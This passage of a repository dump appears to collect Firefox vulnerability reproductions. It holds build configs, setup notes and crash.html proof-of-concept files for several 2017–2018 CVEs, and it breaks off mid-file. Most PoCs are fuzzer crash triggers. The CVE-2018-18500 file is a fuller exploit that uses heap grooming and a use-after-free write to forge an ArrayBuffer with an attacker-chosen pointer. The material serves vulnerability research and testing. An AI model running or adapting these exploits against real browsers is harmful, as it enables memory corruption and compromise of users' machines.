100 | 
101 | - ./dom/webidl/moz.build
102 | 
103 | - ./dom/webidl/FuzzingFunctions.webidl
104 | 
105 | Revisions that added the function with ```--enable-fuzzing``` flags:
106 | 
107 | https://hg.mozilla.org/integration/autoland/rev/80a323cabf56
108 | 
109 | https://bugzilla.mozilla.org/show_bug.cgi?id=1322400
110 | 
111 | https://hg.mozilla.org/mozreview/gecko/rev/f8b273c4a7169d8a4dcdf1bcc591f2b0dec240a9
112 | 
113 | 
114 | ## Run
115 | 
116 | Run Firefox in headless mode:
117 | 
118 | In order for making Firefox opening the PoC file without any other disruption, some preferences need to be added. 
119 | 
120 | Create a new profile:
121 | 
122 | ```
123 | mkdir -p /path/to/firefox/build/directory/tmp/customized_profile
124 | ```
125 | 
126 | create a file called ```user.js``` in the folder. Add preferences inside ```user.js```.
127 | 
128 | Useful preferences include:
129 | 
130 | ```
131 | user_pref("browser.shell.checkDefaultBrowser", false);
132 | user_pref("general.warnOnAboutConfig", false);
133 | user_pref("fuzzing.enabled", true);
134 | user_pref("browser.tabs.remote.autostart", false);
135 | user_pref("security.sandbox.content.level", 1);
136 | user_pref("toolkit.startup.max_resumed_crashes", -1);
137 | user_pref("browser.startup.page", 0);
138 | user_pref("browser.shell.checkDefaultBrowser", false);
139 | user_pref("browser.sessionstore.resume_from_crash", false);
140 | user_pref("browser.tabs.warnOnOpen", false);
141 | user_pref("browser.tabs.warnOnClose", false);
142 | user_pref("security.insecure_field_warning.contextual.enabled", false);
143 | user_pref("security.insecure_password.ui.enabled", false);
144 | 
145 | ```
146 | 
147 | Run firefox with options ```--headless --no-remote --profile /path/to/the/profile/folder/just/created file:///path/to/crash.html```
148 | 
149 | 
150 | 
151 | 


--------------------------------------------------------------------------------
/Firefox/mozconfig:
--------------------------------------------------------------------------------
 1 | #for debug with asan build and jitspew
 2 | # Combined .mozconfig file for ASan on Linux+Mac
 3 | 
 4 | mk_add_options MOZ_OBJDIR=@TOPSRCDIR@/objdir-ff-asan
 5 | 
 6 | # Enable ASan specific code and build workarounds
 7 | ac_add_options --enable-address-sanitizer
 8 | 
 9 | # Add ASan to our compiler flags
10 | export CFLAGS="-fsanitize=address -U_FORTIFY_SOURCE -Dxmalloc=myxmalloc -fPIC"
11 | export CXXFLAGS="-fsanitize=address -U_FORTIFY_SOURCE -Dxmalloc=myxmalloc -fPIC"
12 | 
13 | export LDFLAGS="-fsanitize=address -Wl,--no-as-needed -ldl"
14 | 
15 | # required
16 | ac_add_options --disable-jemalloc
17 | ac_add_options --disable-crashreporter
18 | ac_add_options --disable-elf-hack
19 | 
20 | # Keep symbols to symbolize ASan traces later
21 | export MOZ_DEBUG_SYMBOLS=1
22 | ac_add_options --enable-debug-symbols
23 | ac_add_options --disable-install-strip
24 | 
25 | # Settings for an opt build
26 | ac_add_options --enable-optimize=-O2
27 | ac_add_options --disable-debug
28 | 
29 | # Settings for a debug build
30 | # ac_add_options --disable-optimize
31 | # ac_add_options --enable-debug
32 | 
33 | # other options
34 | ac_add_options --enable-valgrind
35 | ac_add_options --disable-profiling
36 | ac_add_options --enable-tests
37 | 
38 | # fuzzing (optional)
39 | ac_add_options --enable-fuzzing


--------------------------------------------------------------------------------
/Firefox/mozconfig_dbg:
--------------------------------------------------------------------------------
 1 | mk_add_options MOZ_OBJDIR=@TOPSRCDIR@/objdir-ff-dbg
 2 | 
 3 | ac_add_options --disable-crashreporter
 4 | ac_add_options --disable-elf-hack
 5 | 
 6 | # Settings for an opt build
 7 | # ac_add_options --enable-optimize="-g -O2"
 8 | # ac_add_options --disable-debug
 9 | 
10 | # Settings for a debug build
11 | ac_add_options --disable-optimize
12 | ac_add_options --enable-debug


--------------------------------------------------------------------------------
/Firefox/others/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/others/.DS_Store


--------------------------------------------------------------------------------
/Firefox/others/CVE-2017-7802/crash.html:
--------------------------------------------------------------------------------
 1 | <script>
 2 | function start() {
 3 | 	o0=document.createElement('iframe');
 4 | 	o0.src='data:image/gif;base64,R0lGODlhAQABAPAAAAAzEQAAACH5BAQZAAAAIf8LTkVUU0NBUEUyLjADAQAAACwAAAAAAQABAAACAkQBACH5BAQZAAAALAAAAAABAAEAgAAzqgAAAAICRAEAIfkEBBkAAAAsAAAAAAEAAQCAIjMRAAAAAgJEAQAh+QQEGQAAACwAAAAAAQABAIAi/xEAAAACAkQBACH5BAQZAAAALAAAAAABAAEAgP//AAAAAAICRAEAIfkEBBkAAAAsAAAAAAEAAQCA//8RAAAAAgJEAQA7';
 5 | 	o0.seamless='seamless';
 6 | 	o0.addEventListener('load',fun0,false);
 7 | 	document.body.appendChild(o0);
 8 | }
 9 | function fun0() {
10 | 	o8=o0.contentWindow;
11 | 	o8.onresize=fun1;
12 | 	o0.width='3636px';
13 | 	o9=o0.contentDocument;
14 | 	tmp=o9.getElementsByTagName('*');
15 | 	o10=tmp[1];
16 | 	o11=tmp[5];
17 | }
18 | function fun1() {
19 | 	o10.appendChild(o0);
20 | 	o11['textContent']='';
21 | 	FuzzingFunctions.garbageCollect();
22 | 	FuzzingFunctions.cycleCollect();
23 | 	FuzzingFunctions.garbageCollect();
24 | 	FuzzingFunctions.cycleCollect();
25 | 	// fuzzPriv.GC();fuzzPriv.CC();fuzzPriv.GC();fuzzPriv.CC();
26 | 	location.reload();
27 | }
28 | </script>
29 | <body onload="start()"></body>
30 | 


--------------------------------------------------------------------------------
/Firefox/others/CVE-2017-7806/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/others/CVE-2017-7806/.DS_Store


--------------------------------------------------------------------------------
/Firefox/others/CVE-2017-7806/crash.html:
--------------------------------------------------------------------------------
 1 | <script>
 2 | function start() {
 3 | 	o1=window.open('05crab.svg','popup41','width=-11,left=7,innerWidth=2621447,resizable');
 4 | 	window.open('data.html','popup31','left=-2,menubar,toolbar');
 5 | 	o1.onresize=fun0;
 6 | 	o1.resizeTo(-26618,2);
 7 | 	o1.close();
 8 | }
 9 | function fun0() {
10 | 	x=new XMLHttpRequest();
11 | 	x.open("POST","https://mozilla.org",false);
12 | 	try{x.send("test");}catch(e){}
13 | }
14 | </script>
15 | <body onload="start()"></body>


--------------------------------------------------------------------------------
/Firefox/others/CVE-2017-7806/data.html:
--------------------------------------------------------------------------------
1 | <div>


--------------------------------------------------------------------------------
/Firefox/others/CVE-2017-7809/crash.html:
--------------------------------------------------------------------------------
 1 | <script>
 2 | function start() {
 3 | 	// fuzzPriv.enableAccessibility();
 4 | 	o1=document.createElementNS('http://www.w3.org/1999/xhtml','div');
 5 | 	o2=document.createElementNS('http://www.w3.org/1999/xhtml','div');
 6 | 	o4=document.createElementNS('http://www.w3.org/1999/xhtml','div');
 7 | 	o5=window.document;
 8 | 	o6=document.documentElement;
 9 | 	document.documentElement.parentNode.removeChild(o6);
10 | 	o1.appendChild(o2);
11 | 	o22=window.getSelection();
12 | 	o38=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
13 | 	o2.appendChild(o38);
14 | 	try{o5.designMode='on';}catch(e){}
15 | 	o4.style.position='absolute';
16 | 	o5.write('<html><body><div></div><div></div></body></html>');
17 | 	o4.prepend(o1,undefined);
18 | 	o106=document.createElementNS('http://www.w3.org/1999/xhtml','tr');
19 | 	window.top.document.documentElement.appendChild(o4);
20 | 	o22.selectAllChildren(o38);
21 | 	window.top.document.documentElement.appendChild(o106);
22 | 	// fuzzPriv.GC();fuzzPriv.CC();fuzzPriv.GC();fuzzPriv.CC();
23 | 	FuzzingFunctions.garbageCollect();
24 | 	FuzzingFunctions.cycleCollect();
25 | 	FuzzingFunctions.garbageCollect();
26 | 	FuzzingFunctions.cycleCollect();
27 | 	location.reload();
28 | }
29 | </script>
30 | <body onload="start()"></body>
31 | 


--------------------------------------------------------------------------------
/Firefox/others/CVE-2017-7818/crash.html:
--------------------------------------------------------------------------------
 1 | <script>
 2 | function start() {
 3 | 	// launching with GNOME_ACCESSIBILITY=1
 4 | 	// fuzzPriv.enableAccessibility();
 5 | 	o0=document;
 6 | 	o11=document.createElement('input');
 7 | 	o11.id='id2';
 8 | 	o0.designMode='on';
 9 | 	o291=document.createElement("div");
10 | 	o291.id="id2";
11 | 	document.documentElement.appendChild(o291);
12 |         o627=document.createElementNS('http://www.w3.org/2000/svg','svg');
13 | 	o688=document.createElementNS('http://www.w3.org/2000/svg','filter');
14 |         o707=document.createElementNS('http://www.w3.org/2000/svg','feComponentTransfer');
15 |         o688.appendChild(o707);
16 |         o712=document.createElementNS('http://www.w3.org/2000/svg','feDisplacementMap');
17 |         o712.setAttribute('id','id4');
18 |         o688.appendChild(o712);
19 |         o627.appendChild(o688);
20 |         o817=document.createElement('iframe');
21 |         document.documentElement.appendChild(o627);
22 |         document.documentElement.appendChild(o11);
23 |         document.documentElement.appendChild(o817);
24 | 	o707.setAttribute('aria-owns','id2 id4');
25 | 	o817.setAttribute('aria-owns','id4');
26 | 	location.reload();
27 | }
28 | </script>
29 | <body onload="start()"></body>
30 | 


--------------------------------------------------------------------------------
/Firefox/others/CVE-2017-7819/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/others/CVE-2017-7819/.DS_Store


--------------------------------------------------------------------------------
/Firefox/others/CVE-2017-7819/crash.html:
--------------------------------------------------------------------------------
 1 | <script>
 2 | function spin() {
 3 |         var x=new XMLHttpRequest();
 4 |         x.open("POST","https://mozilla.org",false);
 5 |         try{x.send("X");}catch(e){}
 6 | }
 7 | function start() {
 8 | 	o0=document.createElement('iframe');
 9 | 	o0.src='crash.xml';
10 | 	document.body.appendChild(o0);
11 | 	o1=document.createElement('iframe');
12 | 	// o1.src='data:text/html,<div>';
13 | 	o1.src='text.html'
14 | 	o0.addEventListener('load', fun0,false);
15 | 	document.body.appendChild(o1);
16 | 	o2=window.document;
17 | }
18 | function fun0() {
19 | 	o4=o1.contentWindow;
20 | 	o4.onresize=fun1;
21 | 	o16=o0.contentWindow;
22 | 	o17=o0.contentDocument;
23 | 	tmp=o17.getElementsByTagName('*');
24 | 	o18=tmp[0];
25 | 	o28=tmp[4];
26 | 	o62=o17.createRange();
27 | 	o17.designMode='on';
28 | 	document.documentElement.appendChild(o18);
29 | 	o95=o16.getSelection();
30 | 	o95.addRange(o62);
31 | 	o1.setAttribute('height','-9px');
32 | 	o213=document.createElement('style');
33 | 	o62.selectNodeContents(o28);
34 | 	document.documentElement.style.transform='scale(100)';
35 | 	o2.designMode='on';
36 | 	document.documentElement.appendChild(o213);
37 | 	o1.setAttribute('height','-9px');
38 | 	spin();
39 | 	o95.modify('extend', 'forward','lineboundary');
40 | }
41 | function fun1() {
42 | 	o268=document.createElement('iframe');
43 | 	o268.addEventListener('load', fun2,false);
44 | 	o213.appendChild(o268);
45 | }
46 | function fun2() {
47 | 	document.body.appendChild(o0);
48 | 	o0.appendChild(o1);
49 | 	FuzzingFunctions.garbageCollect();
50 | 	FuzzingFunctions.cycleCollect();
51 | 	FuzzingFunctions.garbageCollect();
52 | 	FuzzingFunctions.cycleCollect();
53 | 	// fuzzPriv.GC();fuzzPriv.CC();fuzzPriv.GC();fuzzPriv.CC();
54 | 	location.reload();
55 | }
56 | </script>
57 | <body onload="start()"></body>
58 | 


--------------------------------------------------------------------------------
/Firefox/others/CVE-2017-7819/crash.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <?xml-stylesheet type="text/xsl" href="crash.xsl"?>
3 | <catalog>
4 | </catalog>
5 | 


--------------------------------------------------------------------------------
/Firefox/others/CVE-2017-7819/crash.xsl:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
 3 | 
 4 | <xsl:template match="/">
 5 |   <html>
 6 |   <body>
 7 |   <h2>My CD Collection</h2>
 8 |     <table border="1">
 9 | 	<tr><td>xxxx</td></tr>
10 |     </table>
11 |   </body>
12 |   </html>
13 | </xsl:template>
14 | </xsl:stylesheet>
15 | 


--------------------------------------------------------------------------------
/Firefox/others/CVE-2017-7819/text.html:
--------------------------------------------------------------------------------
1 | <div>


--------------------------------------------------------------------------------
/Firefox/others/CVE-2018-18500/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/others/CVE-2018-18500/.DS_Store


--------------------------------------------------------------------------------
/Firefox/others/CVE-2018-18500/crash.html:
--------------------------------------------------------------------------------
  1 | <head>
  2 | <link rel="icon" href="data:;base64,iVBORw0KGgo=">
  3 | </head>
  4 | <body onload="setTimeout(function () { go(); }, 4000);">
  5 | <h1>log:</h1>
  6 | <p id=p>Sleeping...<br></p>
  7 | <script>
  8 | var xhrs = new Array(40000);
  9 | var xhrs_responses = new Array(40000);
 10 | var delay_xhr = new XMLHttpRequest();
 11 | var delay_xhr2 = new XMLHttpRequest();
 12 | var delay_xhr3 = new XMLHttpRequest();
 13 | var delay_xhr4 = new XMLHttpRequest();
 14 | var formdatas = new Array(4000);
 15 | var xhr_data_uri_length = 0x4000;
 16 | var filereaders = new Array(100);
 17 | var gc_ab = [];
 18 | 
 19 | var p = document.getElementById("p");
 20 | 
 21 | delay_xhr.open('GET', '/delay.xml', false);
 22 | delay_xhr2.open('GET', '/delay.xml', false);
 23 | delay_xhr3.open('GET', '/delay.xml', false);
 24 | delay_xhr4.open('GET', '/test', false);
 25 | 
 26 | function find_malformed_response() {
 27 | 	for (var i = 0; i < 40000; i++) {
 28 | 		xhrs_responses[i] = new Uint32Array(xhrs[i].response);
 29 | 		if (xhrs_responses[i][0] != 0x78787878) { // "xxxx"
 30 | 			return i;
 31 | 		}
 32 | 	}
 33 | 	return null;
 34 | }
 35 | 	
 36 | addEventListener("message", receiveMessage, false);
 37 | function receiveMessage(event)
 38 | {
 39 | 	if (event.data == "0") {
 40 | 		p.innerHTML += "Allocating FileReaders<br>";
 41 | 		for (var i = 0; i < filereaders.length; i++) {
 42 | 			filereaders[i] = new FileReader();
 43 | 		}
 44 | 	} else if (event.data == "1") {
 45 | 		for(var i = 0; i < xhrs.length; i++) {
 46 | 			xhrs[i] = new XMLHttpRequest();
 47 | 		}
 48 | 		let data_uri = "data:text/plain," + "x".repeat(xhr_data_uri_length);
 49 | 		for(var i = 0; i < xhrs.length; i++) {
 50 | 			xhrs[i].open("GET", data_uri, true);
 51 | 			xhrs[i].responseType = "arraybuffer";
 52 | 			xhrs[i].send(null);
 53 | 		}
 54 | 	} else if (event.data == "2") {
 55 | 		var idx = find_malformed_response(); 
 56 | 		if (idx == null) {
 57 | 			p.innerHTML += "Failed corrupting any XMLHttpRequest<br>";
 58 | 		} else {
 59 | 			let blob = new Blob();
 60 | 			let FileReader_idx;
 61 | 			
 62 | 			p.innerHTML += "Malformed ArrayBuffer found in index " + idx + "<br>";
 63 | 
 64 | 			for (var i = 1; i <= Math.floor(xhr_data_uri_length / 0x140); i++) {
 65 | 				// +0xc0 FileReader.mCharset.mLength
 66 | 				// +0xc4 FileReader.mCharset.{mDataFlags,mClassFlags}
 67 | 				// +0xc8 FileReader.mDataLen
 68 | 				// +0xcc FileReader.mDataFormat
 69 | 
 70 | 				if (xhrs_responses[idx][(0x140*i + 0xc0) / 4] == 0 &&
 71 | 						xhrs_responses[idx][(0x140*i + 0xc4) / 4] == 0x20001 && 
 72 | 						xhrs_responses[idx][(0x140*i + 0xc8) / 4] == 0 && 
 73 | 						xhrs_responses[idx][(0x140*i + 0xcc) / 4] == 1) {
 74 | 					var offset = 0x140*i;
 75 | 					p.innerHTML += "Offset to FileReader from malformed ArrayBuffer: 0x" + offset.toString(16) + "<br>";
 76 | 					FileReader_idx = i;
 77 | 					break;
 78 | 				}
 79 | 			}
 80 | 			if (FileReader_idx === undefined) {
 81 | 				p.innerHTML += "Couldn't find FileReader from malformed ArrayBuffer<br>";
 82 | 			} else {
 83 | 				for (i = 0; i < filereaders.length; i++) { 
 84 | 					filereaders[i].readAsArrayBuffer(blob);
 85 | 				}
 86 | 				xhrs_responses[idx][(0x140*FileReader_idx + 0xa8) / 4] = 0x41414141; // mDataPtr
 87 | 				xhrs_responses[idx][(0x140*FileReader_idx + 0xac) / 4] = 0x41414141; // mDataPtr
 88 | 				xhrs_responses[idx][(0x140*FileReader_idx + 0xc8) / 4] = 0x1000; // mDataLen
 89 | 				xhrs_responses[idx][(0x140*FileReader_idx + 0x110) / 4] = 0x1000; // mTotal
 90 | 
 91 | 				setTimeout(function() {
 92 | 					for (i = 0; i < filereaders.length; i++) {
 93 | 						window._41414141 = filereaders[i].result;
 94 | 						if (window._41414141.byteLength != 0) {
 95 | 							p.innerHTML += "Created 0x4141414141414141 ArrayBuffer!<br>";
 96 | 							break;
 97 | 						}
 98 | 					}
 99 | 					if (i == filereaders.length) {
100 | 						p.innerHTML += "Couldn't create 0x4141414141414141 ArrayBuffer<br>";
101 | 					}
102 | 				}, 1000);
103 | 			}
104 | 		}
105 | 	}
106 | }
107 | 
108 | function formdata_append_one(f) {
109 | 	f.append(null, null);
110 | }
111 | function formdata_delete_all(f) {
112 | 	f.delete(null);
113 | }
114 | 
115 | function go() {
116 | for (i = 0; i < formdatas.length; i++) {
117 | 	formdatas[i] = new FormData();
118 | }
119 | let f = document.createElement("iframe");
120 | f.srcdoc = `<body>
121 | 	<script>
122 | 	const MB = 0x100000;
123 | 	function gc() {
124 | 		// Taken from https://github.com/saelo/foxpwn
125 | 		const maxMallocBytes = 128 * MB;
126 | 		for (var i = 0; i < 3; i++) {
127 | 			parent.gc_ab[i] = new ArrayBuffer(maxMallocBytes);
128 | 		}
129 | 	}
130 | 	class CustomImageElement extends HTMLImageElement {
131 | 		constructor() {
132 | 			super();
133 | 			// post message "0" (allocate FileReaders) to parent, and invoke delay XHR request
134 | 			parent.postMessage("0", "*");
135 | 			parent.delay_xhr3.send(null);
136 | 			// "parent" is going to be unusable after document has changed, so we're declaring variables now to hold references to objects inside parent to be able to use them later
137 | 			var formdatas = parent.formdatas;
138 | 			var delay_xhr = parent.delay_xhr;
139 | 			var delay_xhr2 = parent.delay_xhr2;
140 | 			var formdata_delete_all = parent.formdata_delete_all;
141 | 			var parent_ref = parent;
142 | 		
143 | 			gc();
144 | 			location.replace("about:blank");
145 | 			delay_xhr.send(null);
146 | 			// mHandles is freed now
147 | 			for (var i = 0; i < formdatas.length; i++) {
148 | 				formdata_delete_all(formdatas[i]);
149 | 			}
150 | 			// all 0x1000 FormData allocations are freed now
151 | 			// post message "1" (allocate XMLHttpRequests) to parent, and invoke delay XHR request
152 | 			parent_ref.postMessage("1", "*");
153 | 			delay_xhr2.send(null);
154 | 			// post message "2" (continue exploitation) to parent, but without invoking a delay XHR request so that scheduling occurs only after the write-after-free corruption
155 | 			parent_ref.postMessage("2", "*");
156 | 			
157 | 			parent.p.innerHTML += "Custom element constructor returning<br>";
158 | 		}
159 | 	}
160 | 	customElements.define('custom-img', CustomImageElement, { extends: "img" });
161 | 	</scrip` + `t>
162 | 	<img />
163 | 	<img />
164 | 	<img />
165 | 	<img />
166 | 	<img />
167 | 	<img />
168 | 	<img />
169 | 	<img />
170 | 	<img />
171 | 	<img />
172 | 	<img />
173 | 	<img />
174 | 	<img />
175 | 	<img />
176 | 	<img />
177 | 	<img />
178 | 	<img />
179 | 	<img />
180 | 	<img />
181 | 	<img />
182 | 	<img />
183 | 	<img />
184 | 	<img />
185 | 	<img />
186 | 	<img />
187 | 	<img />
188 | 	<img />
189 | 	<img />
190 | 	<img />
191 | 	<img />
192 | 	<img />
193 | 	<img />
194 | 	<img />
195 | 	<img />
196 | 	<img />
197 | 	<img />
198 | 	<img />
199 | 	<img />
200 | 	<img />
201 | 	<img />
202 | 	<img />
203 | 	<img />
204 | 	<img />
205 | 	<img />
206 | 	<img />
207 | 	<img />
208 | 	<img />
209 | 	<img />
210 | 	<img />
211 | 	<img />
212 | 	<img />
213 | 	<img />
214 | 	<img />
215 | 	<img />
216 | 	<img />
217 | 	<img />
218 | 	<img />
219 | 	<img />
220 | 	<img />
221 | 	<img />
222 | 	<img />
223 | 	<img />
224 | 	<img />
225 | 	<img />
226 | 	<img />
227 | 	<img />
228 | 	<img />
229 | 	<img />
230 | 	<img />
231 | 	<img />
232 | 	<img />
233 | 	<img />
234 | 	<img is=custom-img />
235 | 	</body>`;
236 | 
237 | for (var i = 0; i < formdatas.length; i++) {
238 | 	// 43 appends will cause FormData's internal array "mFormData" to re-allocate itself into a 0x1000 allocation
239 | 	for (var j = 0; j < 43-1; j++) {
240 | 		formdatas[i].append(null, null);
241 | 	}
242 | }
243 | 
244 | p.innerHTML += "Allocating 0x1000 buffers with FormDatas<br>";
245 | 
246 | for (var i = 0; i < formdatas.length; i++) {
247 | 	formdata_append_one(formdatas[i]);
248 | }
249 | 
250 | p.innerHTML += "Poking holes in 0x1000 buffers<br>";
251 | 
252 | setTimeout(function () {
253 | 	for (var i = 300; i < formdatas.length; i += 550) {
254 | 		formdata_delete_all(formdatas[i]);
255 | 	}
256 | 
257 | 	document.body.prepend(f);
258 | }, 1000);
259 | 
260 | delay_xhr4.send(null)
261 | }
262 | 
263 | </script>
264 | </body>


--------------------------------------------------------------------------------
/Firefox/others/CVE-2018-18500/server.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
 3 | import SocketServer
 4 | import time
 5 | 
 6 | class S(BaseHTTPRequestHandler):
 7 |     def _set_headers(self):
 8 |         self.send_response(200)
 9 |         self.send_header('Content-type', 'text/html')
10 |         self.end_headers()
11 | 
12 |     def do_GET(self):
13 |         self._set_headers()
14 |         if self.path == '/crash.html':
15 |             self.wfile.write(open('/home/ug16zy2/CVE-2018-18500/crash.html', 'r').read())
16 |         elif self.path == '/delay.xml':
17 |             time.sleep(2)
18 |             self.wfile.write("<xml></xml>")
19 |         elif self.oath == '/test':
20 |             time.sleep(2)
21 |         else:
22 |             self.wfile.write("<html><body><h1>open /crash.html</h1></body></html>")
23 | 
24 |     def do_HEAD(self):
25 |         self._set_headers()
26 |         
27 | def run(server_class=HTTPServer, handler_class=S, port=80):
28 |     server_address = ('127.0.0.1', port)
29 |     httpd = server_class(server_address, handler_class)
30 |     print 'Starting httpd...'
31 |     httpd.serve_forever()
32 | 
33 | if __name__ == "__main__":
34 |     from sys import argv
35 | 
36 |     if len(argv) == 2:
37 |         run(port=int(argv[1]))
38 |     else:
39 |         run()


--------------------------------------------------------------------------------
/Firefox/others/CVE-2018-5091/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/others/CVE-2018-5091/.DS_Store


--------------------------------------------------------------------------------
/Firefox/others/CVE-2018-5091/crash.html:
--------------------------------------------------------------------------------
 1 | <script>
 2 | gc = window.gc || function() 
 3 | {
 4 |   for (var i = 0; i < 0x20000; ++i)
 5 |     var s = new String('AAAA');
 6 | }; 
 7 | var context = new AudioContext();
 8 | var streamDestNode  = context.createMediaStreamDestination();
 9 | var rtcConfig = { "iceServers": [{ "urls": "stun:stun2.l.google.com:19302" },  ] };var localStreams, rtpReceivers
10 | var options = {optional:[{DtlsSrtpKeyAgreement:true}, {RtpDataChannels: true}]};
11 | var rtpSender0 = null,rtpSender2 = null,rtpSender3 = null,rtpSender7 = null;
12 | var pc0 = new RTCPeerConnection(rtcConfig,options);var offer0;var dtmfSender0 = null;
13 | pc0.onicecandidate = function (e) { 
14 | pc0.addIceCandidate(new RTCIceCandidate(e.candidate), function(){}, function(e){});
15 | if(pc0 && pc0.addTrack) streamDestNode.stream.getTracks().forEach(function(track){ rtpSender6 = pc0.addTrack(track, streamDestNode.stream);}); 
16 | }; 
17 | pc0.createOffer(function(offer) {offer0 = offer; if(pc2) pc2.createOffer(function(offer) {offer2 = offer; if(pc2 && pc2.addTrack) streamDestNode.stream.getTracks().forEach(function(track){ rtpSender3 = pc2.addTrack(track, streamDestNode.stream);}); 
18 | if(pc1) rtpReceivers = pc1.getReceivers();
19 | }, function(e) {});
20 | 
21 | try{ localStreams = pc2.getSenders();if(!dtmfSender2) {dtmfSender2 = localStreams[0].dtmf;}}catch(e){} 
22 | }, function(){});
23 | var pc1 = new RTCPeerConnection(rtcConfig,options);var iceCan1;var offer1;var answer1; var dtmfSender1 = null;
24 | pc1.onicecandidate = function (e) { iceCan1 = e.candidate;
25 | if( iceCan1) pc2.addIceCandidate(new RTCIceCandidate(iceCan1)).then(function(){}).catch(function(e){});
26 | }; 
27 | pc1.ontrack  = function (e) { 
28 | try{ localStreams = pc0.getSenders();if(!dtmfSender0) {dtmfSender0 = localStreams[0].dtmf;}}catch(e){} 
29 | }; 
30 | pc1.oniceconnectionstatechange = function listener139(event) {
31 | try{ if(rtpReceivers!=undefined && rtpReceivers[0]!=undefined)rtpReceivers[0].replaceTrack(localStreams[0].track).then(function(){}).catch(function(e){});}catch(e){}
32 | }
33 |  streamDestNode.stream.getTracks().forEach(function(track){ rtpSender2 = pc1.addTrack(track, streamDestNode.stream);})
34 | var pc2 = new RTCPeerConnection(rtcConfig,options);var iceCan2;var offer2;var dtmfSender2 = null;
35 | pc2.onicecandidate = function (e) { iceCan2 = e.candidate;
36 | if (iceCan2)if(pc1)pc1.addIceCandidate(new RTCIceCandidate(iceCan2), function(){},function(e){});
37 | }; 
38 | 
39 | pc2.onsignalingstatechange =function listener173(event) {
40 | setInterval(function(){
41 | if(context) context.close().then(function() {
42 | try{ if(rtpSender2)rtpSender2.replaceTrack(rtpReceivers[0].track).then(function(){
43 |  if(pc0)pc0.getStats().then(function(e){var stats = e;}).catch(function(e){});
44 | }).catch(function(e){});}catch(e){}
45 | }).catch(function(e) {});
46 |  }, 5);
47 | }
48 | ; 
49 | pc2.createOffer(function(offer) {offer2 = offer; 
50 | try{ localStreams = pc1.getSenders();if(!dtmfSender1) {dtmfSender1 = localStreams[0].dtmf; }}catch(e){} 
51 | setTimeout(function() {
52 | if(dtmfSender0) dtmfSender0.insertDTMF("AC", 93,0);
53 | try{ if(localStreams!=undefined && localStreams[0]!=undefined)localStreams[0].replaceTrack(rtpReceivers[0].track).then(function(){ if(pc0)pc0.getStats().then(function(e){var stats = e;
54 | if(pc2 ) streamDestNode.stream.getTracks().forEach(function(track){ rtpSender7 = pc2.addTrack(track, streamDestNode.stream);}); 
55 | }).catch(function(e){
56 | try{ if(rtpReceivers!=undefined && rtpReceivers[0]!=undefined)rtpReceivers[0].replaceTrack(localStreams[0].track).then(function(){}).catch(function(e){});}catch(e){}
57 | if(!dtmfSender2 && rtpSender0){ dtmfSender2 = rtpSender0.dtmf;}	 
58 |  if(rtpReceivers && rtpReceivers[0])rtpReceivers[0].getStats().then(function(e){var stats = e;}).catch(function(e){});
59 | });
60 | if(pc1 ) streamDestNode.stream.getTracks().forEach(function(track){ rtpSender0 = pc1.addTrack(track, streamDestNode.stream);}); 
61 | }).catch(function(e){});}catch(e){}
62 | listener289();
63 | }, 0); 
64 | }, function(){});
65 | pc0.createDataChannel("DataChanName1"); 
66 | pc2.createDataChannel("DataChanName6"); 
67 | function listener289() {
68 | if(offer0 && pc0) pc0.setRemoteDescription(offer0).then( function(){}).catch(function(e){});
69 |  if(rtpSender3)rtpSender3.getStats().then(function(e){var stats = e;
70 | gc();
71 | if(dtmfSender1) dtmfSender1.insertDTMF("D83", 164,70);
72 | if(pc1) pc1.createOffer(function(offer) {offer1 = offer; }, function(e) {
73 | if(dtmfSender2) dtmfSender2.insertDTMF("a*,9DB9*32Dd", 195,210);
74 | try{ pc1.iceConnectionState;}catch(e){}
75 | try{ localStreams = pc0.getSenders();if(!dtmfSender0) {dtmfSender0 = localStreams[0].dtmf;}}catch(e){} 
76 | });
77 | }).catch(function(e){});
78 | }
79 | interval1 = setInterval(function(){
80 | if(offer0 && pc1) pc1.setRemoteDescription(offer0).then( function(){
81 | }).catch(function(e){});
82 | }, 86);
83 | var timeout0 = setTimeout(function(){
84 | if(pc1) pc1.createOffer(function(offer) {}, function(e) {
85 |  if(pc0)pc0.getStats().then(function(e){var stats = e;}).catch(function(e){});
86 | gc();
87 | });
88 | }, 82);
89 | setTimeout(function(){location.reload()},200);</script>


--------------------------------------------------------------------------------
/Firefox/others/CVE-2018-5098/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/others/CVE-2018-5098/.DS_Store


--------------------------------------------------------------------------------
/Firefox/others/CVE-2018-5098/crash.html:
--------------------------------------------------------------------------------
 1 | <script>
 2 | function start() {
 3 | 	o0=document.createElement('iframe');
 4 | 	document.body.appendChild(o0);
 5 | 	o1=window.open('data.html','popup35','height=134');
 6 | 	o1.onload=fun0;
 7 | }
 8 | function fun0(e) {
 9 | 	o5=e.target;
10 | 	o1.onresize=fun2;
11 | 	tmp=o5.getElementsByTagName('*');;
12 | 	o6=tmp[0];
13 | 	o7=tmp[1];
14 | 	o8=tmp[3];
15 | 	o15=document.createElement('input');
16 | 	o20=document.createElement('marquee');
17 | 	o20.addEventListener('DOMAttrModified',fun1);
18 | 	o8.appendChild(o20);
19 | 	o7.replaceWith(o15);
20 | }
21 | function fun1() {
22 | 	o15.type='number';
